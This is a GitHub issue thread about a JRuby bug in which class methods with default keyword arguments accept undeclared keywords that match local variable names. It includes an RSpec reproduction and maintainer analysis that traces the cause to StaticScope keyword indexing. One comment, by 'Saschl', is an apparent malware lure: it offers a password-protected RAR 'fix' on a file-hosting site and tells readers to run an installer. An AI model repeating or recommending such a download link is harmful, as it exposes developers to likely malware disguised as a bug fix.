### ISSUE TITLE
Class methods with default keyword argument accepts keyword arguments with local variable name

### ISSUE THREAD

**Issue by rajaravivarma-r** [jruby/jruby#8344]
**Environment Information**
  
Provide at least:
* JRuby version (`jruby -v`) and command line (flags, JRUBY_OPTS, etc)
  * `jruby 9.4.6.0 (3.1.4) 2024-02-20 576fab2c51 OpenJDK 64-Bit Server VM 22+35-2369 on 22+35-2369 +jit [arm64-darwin]`
  * Happens with and without `JRUBY_OPTS="--dev"`
* Operating system and platform (e.g. `uname -a`)
  * `Darwin admins-MacBook-Pro.local 23.5.0 Darwin Kernel Version 23.5.0: Wed May  1 20:13:18 PDT 2024; root:xnu-10063.121.3~5/RELEASE_ARM64_T6030 arm64`
 

Other relevant info you may wish to add:
* Installed or activated gems
   * Reproducible with standard gems
* Application/framework version (e.g. Rails, Sinatra)
* Environment variables
  * JAVA_HOME=/Users/rajaravivarma/.asdf/installs/java/openjdk-22 

**Expected Behavior**
JRuby should not allow keyword arguments that are not part of the method signature for any method. 

In this instance, the class methods are the one that allows keyword arguments that are not part of the method signature, but has the same name as a local variable.

Minimal example to reproduce the error. All of these test should pass, but they don't.

* Calling A.test_method_with_default_argument(method_var: 'a') should raise an `ArgumentError`, but it doesn't
* Calling A.test_method_three(method_var: 'a') should raise an `ArgumentError`, but it doesn't

```ruby
require 'rspec'

class A
  class << self
    # Problematic method
    def test_method_with_default_argument(kw_arg: 1)
      method_var = kw_arg
      puts method_var
    end

    def test_method_two(kw_arg:)
      method_var = kw_arg
      puts method_var
    end
  end

  # Problematic method
  def self.test_method_three(kw_arg: 1)
    method_var = kw_arg
    puts method_var
  end

  def self.test_method_four(kw_arg:)
    method_var = kw_arg
    puts method_var
  end

  def test_instance_method(kw_arg: 1)
    method_var = kw_arg
    puts method_var
  end
end

RSpec.describe A do
  describe '.test_method_with_default_argument' do
    it 'should throw an exception' do
      expect { A.test_method_with_default_argument(method_var: 'a') }.to raise_error(ArgumentError)
    end
  end

  describe '.test_method_two' do
    it 'should throw and exception' do
      expect { A.test_method_two(method_var: 'a') }.to raise_error(ArgumentError)
    end
  end

  describe '.test_method_three' do
    it 'should throw and exception' do
      expect { A.test_method_three(method_var: 'a') }.to raise_error(ArgumentError)
    end
  end

  describe '.test_method_four' do
    it 'should throw and exception' do
      expect { A.test_method_four(method_var: 'a') }.to raise_error(ArgumentError)
    end
  end

  describe '#test_instance_method' do
    it 'should throw and exception' do
      expect { A.test_method_two(method_var: 'a') }.to raise_error(ArgumentError)
    end
  end
end
```

**Actual Behavior**
JRuby allows keyword arguments with same name as a local variable name in class methods.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by headius** [comment]
Looks like a reduced example is `def foo(a: 1); b = a; end; foo(b: "a")`. You got it right: the problem is that we're allowing keyword arguments for any name that appears in the local variable table, when we should only be doing it for actual keyword arguments. Probably an easy fix.

**Comment by headius** [comment]
@enebo Seems like it bottoms out here for the JIT at least: https://github.com/jruby/jruby/blob/d994845e08ff1c9a2aef1d12f70599b980b67e98/core/src/main/java/org/jruby/parser/StaticScope.java#L409-L414

I wasn't clear on the best way to fix this. Perhaps it should go to a different structure to determine if the variable is actually a keyword?

**Comment by enebo** [comment]
@headius something is wrong with firstKeywordIndex BUT even if that is fixed Prism does not encode firstKeywordIndex at all.  So:

1. Can I make that work with Prism again (1.0 is tagged so I plan on updating for that)?
2. why is your case broken?  are we cloning and losing firstKeywordIndex?  wrong value initially during parse?

**Comment by enebo** [comment]
Also adding that this is broken in starup interp and not just the JIT.

**Comment by enebo** [comment]
Ok.  So the problem is that local variables are added to StaticScope after keyword variables if they are declared.   `b` is after `a` so it thinks it is a valid kwarg.  To fix this we need to know how many kwargs are listed which should be possible with signature but it may not be trivial.  Simple explanation though.

**Comment by enebo** [comment]
Looks like it is trivial after all Signature#kwargs appears to be as much as we need.
